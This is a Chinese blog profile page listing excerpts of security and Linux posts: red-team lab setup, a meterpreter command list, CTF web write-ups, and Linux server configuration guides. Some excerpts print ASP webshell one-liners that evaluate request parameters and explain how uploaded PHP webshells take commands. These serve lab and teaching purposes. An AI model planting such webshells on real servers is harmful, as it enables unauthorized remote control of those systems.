自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(46)
  • 资源 (3)
  • 收藏
  • 关注

原创 ATT&CK实战系列——红队实战(一)

一. 环境搭建进入windows,密码:hongrisec@2019环境配置结果:web(win7) 192.168.3.104 192.168.17.128win2003 192.168.17.129win2008(域控) 192.168.17.130备注:由于不是一次性做完,web机的网段3所分配的网址会有相应的变化,不影响结果第一次配置环境发现C盘中启动phpstudy之后本机无法访问所搭建的网站发现IP配置出问题了,虚拟机网卡配置设置成为桥接模式配置如下(3

2020-08-12 16:01:09 1246 1

原创 Linux防火墙及其配置

防火墙不能物理隔离,可以逻辑隔离,Linux里面自带的防火墙是一种包滤性防火墙通过控制进出数据包来实现系统安全防火墙的功能:1.访问控制2.防止外部攻击3.防火墙的地址转换5.日志与报警6.身份认证类型:1.包过滤:数据包筛选机制2.代理服务:双宿主机上断开网络层,比上一个更安全3.状态监测:网络层检测模块解惑数据包,并读取相关信息发现参数有意外的变化,链接直接终止...

2020-04-09 13:38:57 361

原创 Linux下搭建DHCP服务器

DHCP服务器搭建DHCP:动态主机配置协议概述:软件包:dhcp配置文件:/etc/dhcp/dhcp.conf租约文件:/var/lib/dhcpd/dhcpd.leases #租约到期还没有联系上DHCP,客户机的IP被设置成169.254.0.0监听端口:67/udp配置文件模板:/usr/share/doc/dhcp-common-4.2.5/dhcp.conf.sam...

2020-04-08 14:08:59 199

原创 Linux下FTP服务器的配置与搭建

1.VSFTP概述安全性是编写VSFTP的初衷,除了这与生俱来的安全特性以外,高速与高稳定性也是VSFTP的两个重要特点。在速度方面,使用ASCII代码的模式下载数据时,VSFTP的速度是Wu-FTP的两倍,如果Linux主机使用2.4.*的内核,在千兆以太网上的下载速度可达86MB/S。在稳定方面,VSFTP就更加的出色,VSFTP在单机(非集群)上支持4000个以上的并发用户同时连接,...

2020-04-08 11:52:02 432

原创 Linux搭建DNS服务器详细步骤

配置主域名服务器正向区域步骤:前提条件:配置静态IP地址;DNS服务器指向自己本机DNS客户端ip指向DNS服务器 1.安装DNS软件包:bind bind-chroot 1.yum install bind-chroot -y 2.挂载CDROM--rpm -ivh bind* 2.编辑DNS主配置文件:/etc/named.conf options{ ...

2020-04-08 08:51:10 2898

原创 meterpreter常用命令大全

meterpreter 是一个 Linux 终端在受害者的计算机上。这样,我们的许多基本的Linux命令可以用在meterpreter甚至是在一个窗口或其他操作系统。这里有一些核心的命令可以用在meterpreter。帮助菜单 background – 将当前会话移动到背景 bgkill – 杀死一个背景 meterpreter 脚本 bglist – 提供所有正在运行的后台脚本的列表 bgrun – 作为一个后台线程运行脚本 channel – 显示活动频道 close – 关

2021-09-24 18:19:19 1276

转载 探索Java中Predicate接口的使用

直接上Predicate的源码:public interface Predicate<T> { /** * Evaluates this predicate on the given argument. */ boolean test(T t); /** * Returns a composed predicate that represents a short-circuiting logical * AND of this

2021-08-24 23:41:28 237

原创 CTF从0到1,web1-2

本地成功配置环境,访问如图:http://127.0.0.1/提示Git泄露,直接利用GitHack.py工具:下载地址:https://github.com/lijiejie/GitHack命令:python2 GitHack.py http://127.0.0.1/.git/结果如下:查看index.html文档发现:Congrandulations!!!...

2021-06-15 17:34:14 252

原创 CTF从0-1,web1-1,wp

本地成功搭建环境后,访问http://127.0.0.1/得到页面直接利用dirsearch扫描python3 dirsearch -u http://127.0.0.1/ -e*访问http://127.0.0.1/robots.txt 发现目录/flag1_is_her3_fun.txt得到第一段flag访问http://127.0.0.1/index.php~得到第二段flag访问http://127.0.0.1/index.php.swp得到第三段flagFLAG:n1book{

2021-06-15 16:57:33 277 1

原创 Eclipse添加class报错

新版eclipse在直接添加class时,会直接报错,让用户删除class类这是因为在创建class的过程中出现了问题解决办法是在:创建class的时候同时需要给你的class所在的包进行命名(下图中的Package中输入你想输入的名字)结果如下图(class成功创建成功):...

2021-05-08 13:31:26 2771 1

原创 虚拟机中开启TV(VM虚拟机中使用手机模拟器)

使用环境vSphere 6.5 以上虚拟机关机状态下修改1、修改虚拟机CPU设置,勾选虚拟化引擎下的两个选项2、在虚拟机设置------选项-----高级中找到配置文件,然后在本地中找到配置文件用记事本打开加入下面两行代码:monitor.virtual_exec = “hardware”hypervisor.cpuid.v0 = “FALSE”大功告成!!!!...

2021-01-25 13:39:59 4658 3

原创 执行漏洞总结

preg_replace()使用一 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等demo code 1.1:<?phpecho `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射,如include()、include_once()、 require()、require_once(

2020-06-26 18:22:41 97

原创 PHP函数功能

PHP函数功能函数 描述 PHPbasename() 返回路径中的文件名部分。chgrp() 改变文件组。chmod() 改变文件模式。chown() 改变文件所有者。clearstatcache() 清除文件状态缓存。copy() 复制文件。delete() 参见 unlink() 或 unset()。dirname() 返回路径中的目录名称部分。disk_free_space() 返回目录的可用空间。disk_total_space() 返回一个目录的磁盘总容量。diskfree

2020-06-26 18:18:35 206

原创 PHP程序的常见漏洞攻击分析

PHP程序的常见漏洞攻击分析不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。在节,我们将从全局变量,远程文件,文件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。如何通过全局变量进行攻击?PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法。一旦一个变量被创建了,就可以在程序中的任何地方使用。这个特点导致

2020-06-26 18:16:14 157

原创 AG一句话木马总结

asp一句话木马<%eval request("AG")%><%execute request("AG")%><%execute(request("AG"))%><%execute request("AG")%><%'<% loop <%:%><%'<% loop <%:%><%execute request("AG")%>"%><%execute(request("

2020-06-25 20:44:03 499

原创 aspx一句话总结

asp和aspx的区别为:编写不同、安全性不同、文件类du型写不同。一、编写不同1、asp:asp支持visual studio 编写,编写效率更低dao。2、aspx:aspx支持visual studio .net编写,编写效率更高。二、安全性不同1、asp:asp的安全性较低,程序可在客户端运行,也可服务器端运行。2、aspx:aspx的安全性较高,程序必须都在服务器端运行。三、文件类型不同1、asp:asp是属于asp文件类型的文件后缀名。2、aspx:aspx是属于asp.net

2020-06-25 20:18:18 1341

原创 jsp一句话总结

**基本原理**由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即把要执行的代码提前写在shell中,然后每次只需要传递要调用的函数名以及对应的参数即可。虽然可以实现相应的功能,但是带来一个问题就是shell体积非常巨大。菜刀的jsp脚本有7kb大小,蚁剑的jsp custom脚本即使去掉注释后还有17k之多,用起来非常的不方便。冰蝎的作者rebeyond大佬在文章 利用动态二进制加密实现新型一句话木马

2020-06-25 20:12:07 5392

原创 PHP小马总结

利用文件上传漏洞,往目标网站中上传一句话木马,只要攻击者满足三个条件,就能实现成功入侵。(1)木马上传成功,未被杀;(2)知道木马的路径在哪;(3)上传的木马能正常运行。我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数

2020-06-25 19:55:49 385

原创 BUUCTF—WEB-WarmUp

warm来到题目,一来就是一个表情包在这里插入图片描述啥也不说,直接查看源代码看见source.php的提示,直接加入url进行访问得到一段代码:<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php",

2020-05-25 22:09:40 235

原创 常用数据库介绍及其sql注入相关原理

常用数据库介绍: Access数据库 +.asp Mssql数据库 +.net 到 http://xxx/.aspx 到 IIS(都可以解析.asp) Mysql数据库 +PHP 到 http://xxx/.php 到 Apache Oracle数据库 +JAVA 到 http://xxx/.jsp 或者.do或者.action 到Tomcat或者Nginx或者J...

2020-05-07 16:12:31 154

原创 googlehack和nmap基本使用方法

google hack:site:限制你搜索范围的域名inurl:用于搜索网页上包含的URLintext:只搜索网页<body>部分中包含的文字(忽略标题)intitle:查包含关键词的页面,一般用于社工别人的webshell密码filetype:doc/pdf/....指定文件类型搜索Nmap常用功能:端口范围: 0-65535-sT TCP co...

2020-05-07 16:03:15 170

原创 抓包分析介绍

数据包中:请求方法(get、post、options、trace)备注:注意全是大写状态码请求头(重要信息介绍):user_agent(访问对象)is_referer(当前网页)referer(上一个网页)accept( 限制上传文件类型)cookiehost响应头:content-length:响应长度(暴力破解重要依据),不同界面响应长度不一样content-typ...

2020-05-07 16:02:17 236

原创 中间件解析漏洞

上传漏洞常见中间件 IIS 解析漏洞: 目录解析(IIS 5.x/6.0) /xx.asp/xx.jpg 将jpg按照asp解析 /xx.asp/xx.* 文件解析 xx.asp;.jpg 分号前的后缀视为不见 默认解析(IIS 6.0) 黑名单是可能被忽略 /wooyun.asa 进行访问 /wooyun.cer 进行访问 /wooyun....

2020-05-07 15:56:42 462

原创 Firefox和Chrome导入Brupsuit证书

Firefox浏览器第一步:打开BurpSuite第二步:访问http://127.0.0.1:8080/,下载CA证书第三步:打开浏览器设置,导入证书。Chrome浏览器第一步:打开BurpSuite第二步:访问http://127.0.0.1:8080/,下载CA证书第三步:打开浏览器设置,导入证书备注:新版Chrome浏览器就算导入证书后也会出现证书无效的情况,...

2020-04-24 21:35:49 548

原创 python面向对象编程

面向对象编程OOP :object oriented programming1.类设计一个飞机plane 图纸 几个螺旋桨 几个机翼 几个轮子 飞机多长命名规则:驼峰式命名法大驼峰 PrintStar小驼峰 Printstar元素:类名 属性 方法class Make_Plane(object):#属性color = “green”wheelNum = 3 ##魔法方法...

2020-04-23 15:08:24 65

原创 VS2019提示scanf不安全问题

我们现在学的就是使用scanf()语句进行输入,但是vs2019中却报错显示不安全首先我先来说一下scanf和scanf-s的区别scanf()函数是标准C中提供的标准输入函数,用以用户输入数据scanf_s()函数是Microsoft公司VS开发工具提供的一个功能相同的安全标准输入函数,从vc++2005开始,VS系统提供了scanf_s()。在调用该函数时,必须提供一个数字以表明最多读...

2020-04-22 11:46:13 6070 5

转载 理解STP

理解STPweixin_34128534 2011-08-31 19:04:07 35 收藏展开STP(生成树协议的实现)STP乃交换部分的核心所在!!!!!生成树协议是一种二层管理协议,它通过有选择性地阻塞网络冗余链路来达到消除网络二层环路的目的,同时具备链路的备份功能。生成树协议和其他协议一样,是随着网络的不断发展而不断更新换代的。“生成树协议”是一个广义的概念,并不是特指IEE...

2020-04-21 19:59:13 741

原创 JAVAscript基础

基础与内容输出 一种直译式的脚本语言 使用: 1.命令通常以;结束 2.HTML中的JS代码要在<script></script>之间 3.JS的代码可以独立存在一个JS文件中 备注:独立文件中只存放函数就行,不能跟标签 4.独立的JS文件可以在<script></script>标签的src属性中引用 备注:<s...

2020-04-15 10:59:12 68

原创 HTML最详细的教程

1.各元素都是一种标记或者标签2.单标签格式<名称/>,双标签<名称></名称>3.对大小写不敏感基本结构: 文字内容 文字内容 <html> <head> <title>文字内容</title> </head> <body>';`基础标签: &...

2020-04-14 16:01:12 148

原创 windows基础以及NTFS文件系统介绍

林环境的搭建前提条件: 1.网络可以ping通 2.DNS指向要注意 3.域名的命名规则父与子的关系: DNS指向父域配置DNS:在正向查找区域中新建dns查询在dns管理器中 对着正向查找区域右键 新建区域image然后2个下一步后(这2个下一步没啥太多重要内容 基本上默认选项就可以了 而且那选项那写着很清楚就不明说了)在区域名称里输入要解析的区域(一般输入根区域)...

2020-04-13 08:25:27 286

原创 Windows林环境的搭建和dns服务器的配置

林环境的搭建前提条件: 1.网络可以ping通 2.DNS指向要注意 3.域名的命名规则父与子的关系: DNS指向父域配置DNS:在正向查找区域中新建dns查询在dns管理器中 对着正向查找区域右键 新建区域image然后2个下一步后(这2个下一步没啥太多重要内容 基本上默认选项就可以了 而且那选项那写着很清楚就不明说了)在区域名称里输入要解析的区域(一般输入根区域)...

2020-04-13 08:22:31 395

原创 MBR磁盘

真机安装操作系统的步骤:1.制作一个U盘启动盘(下载大白菜)2.把ISO镜像文件放入U盘3.重启电脑,进入BIOS4.设置U盘启动(第一项BOOT)5.U盘启动成功(PE系统,相当于简化的操作系统)6.克隆操作系统到C:或GHOST(3-2-1)7.最后选C2、 mbr结构:引导占用硬盘开头的512字节,前446字节为引导代码,中间64个字节为4个主分区表信息,最后两个字节为启...

2020-04-13 08:20:10 322

原创 Linux文件编辑

vim(纯文本编辑器)的三种模式:普通模式,插入模式,末行模式命令(打开文件的方法):1.vim file //光标置于第一行行首2.vim file +n //光标置于第n行3.vim file + //光标置于末尾行的行首4.vim file +/pattern //光标置于与pattern匹配的字符串处,pattern为任意字符vim 字符有颜色标记,很容易差错普通模式下:...

2020-04-13 08:18:59 130

原创 Linux系统目录与重要文件详解

linux系统目录特点:1.一切从根开始2.根下是个有层次的树状结构3.分区和磁盘是挂载在根上的备注:FHS是目录规范标准网络管理:ipconfig配置IP地址(临时):ipconfig 网卡名 IP netmask 子网掩码例:ipconfig ens33 192.168.1.1 netmask 255.255.255.0修改网络配置文件配置IP地址:网卡信息配置文件配置ip...

2020-04-13 08:17:12 233

原创 增强DNS安全性的措施

选择没有缺陷的DNS版本(2) v8,曾经使用最多最广的版本,其详细内容可以参阅“BIND8+域名服务器安全增强”(3)v9,最新版本的BIND,全部重新写过,免费(但是由商业公司资助),BIND9在2000年10月份推出,根据调查v9版本的BIND是最安全的,它的最新安全版本在其官方网站http://www.isc.org/上,下 载源代码安装即可。例如,Linux 系统针对拒绝服务攻击只要...

2020-04-13 08:16:14 1015

原创 SSH的介绍以及配置

SSL:(Secure Socket Layer,安全套接字层),为Netscape所研发,用以保障在Internet上数据传输之安全,利用数据加密(Encryption)技术,可确保数据在网络上之传输过程中不会被截取。当前版本为3.0。它已被广泛地用于Web浏览器与服务器之间的身份认证和加密数据传输。SSL/TLS协议提供的服务主要有:1.认证用户和服务器,确保数据发送到正确的客户机和...

2020-04-09 16:54:49 146

原创 squid代理服务器的安装与配置

一、 squid 代理服务器概述 代理服务器英文全称是Proxy Server,其功能就是代理网络用户去取得网络信息。 Squid是-个缓存Internet数据的软件,其接收用户的下载申请,并自动处理所下载的 数据。当一个用户想要下载一个主页时,可以向Squid发出一个申请,要Squid代替其 进行下载,然后Squid连接所申请网站并请求该主页,接着把该主页传给用户同时保留 ...

2020-04-09 10:16:10 287

原创 Linux核心命令

cd切换路径:语法:cd 【选项】【路径】~表示用户的家 cd = cd~… 表示当前目录的上一级- 切换到当前用户上一次所在的目录路径/ 直接切换到根下技巧:1.使用TAB自动补齐功能2.相对路径是从当前目录或指定目录开始ls:列出目录的内容以及其内容的属性信息语法:ls [option] [file]选项:-l //使用长格式列出文件以及目录信息-a//显...

2020-04-08 17:14:50 178

原创 Linux文件权限详解

系统安全的核心基础linux中都可以给谁赋予权限?普通用户 组 其他人U G O linux中的权限有:r w x a所有人 t特殊权限//具有最高权限时也无法删除我的文件,只有所属的主人可以删除读 写 运行怎么给?chmod //赋予权限的命令 语法: chomd 被赋予的对象(+-=) 权限 授予权限的对象(文件或目录) 选项: -R //传递父项权限给子...

2020-04-08 17:11:35 137

原创 Linux下文件的过滤和查找

过滤文件命令grep:功能是从文本文件或管道数据流中筛选匹配的行及数据配合正则表达式一起使用,功能更强大语法格式: grep [option] [pattern] [file]常用选项: -v 显示不匹配的行,或者说排除某些行: grep -v 要过滤的内容 文件名 -n 显示匹配行及行号 -c 只统计匹配的行数: grep -c 要过滤的内容 文件名 -i 不区分大小...

2020-04-08 17:09:58 4736

MutiThreadForWindows.py

example: python C:\Users\uuuuu\Desktop\hacker\源码泄露工具(自动访问常见的CTF线索文件)\MutiThreadForWindows.py http://127.0.0.1/ 2 5

2020-04-25

SourceLeakHackerForWindows.py

下载后直接在命令行使用,文件后+http:\\网站的名字,即可发生检索,对于子网站和目标的探查都有很大的帮助

2020-04-24

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除